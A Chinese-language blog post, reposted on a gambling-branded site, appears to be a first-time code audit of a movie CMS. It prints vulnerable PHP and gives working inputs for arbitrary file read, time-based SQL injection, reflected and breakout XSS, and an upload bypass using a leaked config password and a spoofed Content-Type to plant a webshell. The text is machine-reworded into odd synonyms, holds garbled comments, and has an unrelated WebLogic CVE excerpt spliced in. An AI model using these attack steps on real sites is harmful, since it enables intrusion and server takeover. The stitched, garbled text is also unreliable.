某影戏cms审计处体验 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

某影戏cms审计处体验

申博_安全预警 申博 116次浏览 已收录 0个评论

最近在secquan看到皮师傅写的代码审计,以为还阔以,下载源码下来看看,审计了一下昼,也发清楚明了几个辣鸡破绽,写下文章,纪录下第一次代码审计。

文件读取(鸡肋)

like.php

地位:data/like.php

症结代码

$fang=$_GET['play'];
$jmfang=base64_decode($fang);
$like=file_get_contents($jmfang);
$likezz="/<ul class='s-guess-list g-clear js-list' data-block='tj-guess' monitor-desc=\"猜你喜好\">(.*?)<\/ul>/is";
$kikez1="/ <img src=\"(.*?)\" data-src='(.*?)'>
            <\/a>
            <div class='s-guess-right'>
                <p class='title'><a href='(.*?)' data-index=(.*?)>(.*?)<\/a><\/p>
            <\/div>
/is";

preg_match_all($likezz, $like,$likearr);
preg_match_all($kikez1, $likearr['1']['0'],$liketitle);
...........略.........

直接传play参数,然后读取

某影戏cms审计处体验

读取文件

某影戏cms审计处体验

能够读取只是没有显现,由于like.php中关于读取的文件会本身举行处置惩罚,按肯定的花样举行输出。另外皮师傅发明的fenlei.php的文件读取更好,这里就不再说清楚明了。

雷同的另有play.php

<?php
error_reporting(0);
$player = base64_decode($_GET['play']);
$tvinfo = file_get_contents($player);

SQL

agent/index.php

<?php
require dirname(__FILE__) . "/dzsck.php";
if($_GET['type']=='Sell' and $_GET['id']!=''){  
   $cm->query("UPDATE d_kami SET km_sell=1 WHERE km_id ='".$_GET['id']."'");
   echo tiao("已复制好,可贴粘。", "index.php");
    exit();
  }
if($_GET['type']=='close' and $_GET['id']!=''){  
   $cm->query("UPDATE d_kami SET km_sell=0 WHERE km_id ='".$_GET['id']."'");
   echo backs("卡密作废复制胜利!");
   exit();
  } 
$cm->query("SELECT * FROM d_adminuser where admin_id='" . $_SESSION["adminid"] . "' order by admin_id asc");  
$adminuser = $cm->fetch_array($rs);
$cm->query("SELECT * FROM d_kami where km_uid='" . $_SESSION["adminid"] . "' order by km_type asc");
$mypagesnum = $cm->db_num_rows();
?>
  ............略...............

能够看到id参数没有任何过滤带入sql语句,盘他,由于这里是署理的功用,以是要先注册一个署理,直接注册就行

Payload:http://192.168.0.100/tuana/agent/index.php?type=Sell&id=123

某影戏cms审计处体验

时候盲注

相似的注入另有

http://192.168.0.100/tuana/agent/index.php?type=close&id=123

XSS

payreturn.php

$orderid = $_GET["orderid"];
    //$isql="update d_ddcenter set dd_type=1 where dd_order='".$orderid."'";
    //$ddinfo=mysql_query($isql);
    //$cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "'");
    //$row = $cm->fetch_array($rs);
    //$dd_adminid=$row['dd_adminid'];
    echo $orderid;
    $cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "' order by dd_id desc");
    $km_number = $cm->fetch_array($rs);
    $cm->query("SELECT * FROM d_adminuser where admin_id='" . $km_number["dd_adminid"] . "'    ");
    $km_number3 = $cm->fetch_array($rs);
        if($km_number["dd_vip"]==1){
           if( $km_number3['admin_endtime']<time())$ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=".time()."+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
           else $ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=admin_endtime+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
            }
.............略....................

将传入的orderid参数直接输出,很明显的xss

某影戏cms审计处体验

XSS2

admin/edituser.php

<?php
require dirname(__FILE__) . "/dzsck.php";
if (($_GET["type"] == "edit") && $_POST) {
    $date = array("admin_aglevel" => $_POST["admin_aglevel"]);
    $updates = $cm->cmupdate($date, "admin_id='" . $_POST["id"] . "'", "d_adminuser");
 if($updates)
   {echo tiao("修正胜利!", "edituser.php?id=" . $_POST["id"]);
   exit();
   }
   else{echo tiao("修正失利,请从新修正!", "edituser.php?id=" . $_POST["id"]);
   exit();
   } 
    }

这里POSTid没有任何处置惩罚就直接输出,看起来是个xss,那就尝尝

Weblogic恣意文件读取破绽(CVE-2019-2615))and 文件上传破绽(CVE-2019-2618)破绽剖析

0x00 背景 4月17号,Oracle发布2019年4月的重要补丁更新公告,其中披露了Weblogic的多个漏洞。其中CVE-2019-2615和CVE-2019-2618的评分比较低,一个4.9,一个5.5。因为这两个漏洞都需要用户名密码的认证才可利用,所有有些鸡肋。想看下官方的修复措施,故简单分析一下这两个漏洞。 0x01 漏洞环境 本地搭建测试环境,测试环境为:Weblogic 10.3.6.0、Windows Sercer 2008 x64、Java 1.7.0_80。 Weblogic的安装包和安装配置方法参见之前的文章Weblogic XMLDecoder 远程代码执行漏洞分析(CVE-2017-10271),里面有下载连链接。 也可以用p牛的vulhub,用docker搭建,也很方便。 远程调试的话参考这篇文章:使用 Idea 远程断点调试 Weblogic 服务器的操作步骤。weblogic的startWeblogic.cmd加上一句配置,启动weblogic。本地的IDEA新建个web项目,导入weblogic.jar包,配置下远程调试。 然后在相应位置打断点,debug运行,就能进入断点,看到调用的堆栈信息。 0x02 漏洞分析(CVE-2019-2615) <1> 漏洞复现 该漏洞是任意文件读取漏洞,这个漏洞接口是文件下载相关功能使用的接口,也是weblogic server中内部使用的正常功能,所以该漏洞需要weblogic的用户名密码,所以也是个鸡肋的

某影戏cms审计处体验

直接插入xss,发明并不可,代码直接酿成如许了

<script type='text/javascript'>alert('修正胜利!');location.replace('edituser.php?id=<script>alert(/xss/)</script>');</script>

仔细观察,发明edituser.php?id会把$_POST["id"]的内容直接衔接,而且添加了一些其他的器械);</script>,像个设施绕过,实验将POST的内容改成admin_aglevel=1&id=123</script>');<script>alert(/xss/)</script>('

某影戏cms审计处体验

胜利xss

文件上传

某影戏cms审计处体验

跟进index.php看看,

<?php
if(is_array($_FILES["upfile"])){
$i=0;
if($_POST['pwd'] != $passwd){
    echo '<script>alert("��û��Ȩ��")</script>';
    exit;
}
while($i<count($_FILES["upfile"])){
if ($_SERVER['REQUEST_METHOD'] == 'POST')
{


if (!is_uploaded_file($_FILES["upfile"][tmp_name][$i]))
//�Ƿ�����ļ�
{
// echo $_FILES["upfile"][tmp_name][$i];
echo "<font color='red'>�ļ�Ԥ����</font>";
exit;
}
// echo $_FILES["upfile"][tmp_name][$i];
 $file = $_FILES["upfile"];
 if($max_file_size < $file["size"][$i])
 //����ļ���С
 {
 echo "<font color='red'>�ļ�̫��</font>";
 exit;
  }

if(!in_array($file["type"][$i], $uptypes))
//����ļ�����
{

 echo "<font color='red'>�����ϴ��������ļ���</font>";
 exit;
}

if(!file_exists($destination_folder))
if(!mkdir($destination_folder,0777,true)){
    echo "<font color='red'>������Ŀ¼ʧ��,���ֶ�������</a>";
}


$filename=$file["tmp_name"][$i];
$image_size = getimagesize($filename);
$pinfo=pathinfo($file["name"][$i]);
$ftype=$pinfo[extension];
$destination = $destination_folder.$i.time().".".$ftype;
if (file_exists($destination) && $overwrite != true)
{
     echo "<font color='red'>ͬ���ļ��Ѿ������ˣ�</a>";
     exit;
  }
echo $destination;
 if(!move_uploaded_file ($filename, $destination))
 {
   echo "<font color='red'>�ƶ��ļ�����</a>";
     exit;
  }

$pinfo=pathinfo($destination);
$fname=$pinfo[basename];

这里要注意的是,我们直接上传的话提醒输入暗码,还好暗码就在inc/aik.config.php

某影戏cms审计处体验

tu_pass=123456

某影戏cms审计处体验

上传phpinfo尝尝,很明显,范例不正确,实验修正Content-Type

某影戏cms审计处体验

上传胜利!

某影戏cms审计处体验

尝尝一句话

某影戏cms审计处体验

胜利getshell


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明某影戏cms审计处体验
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址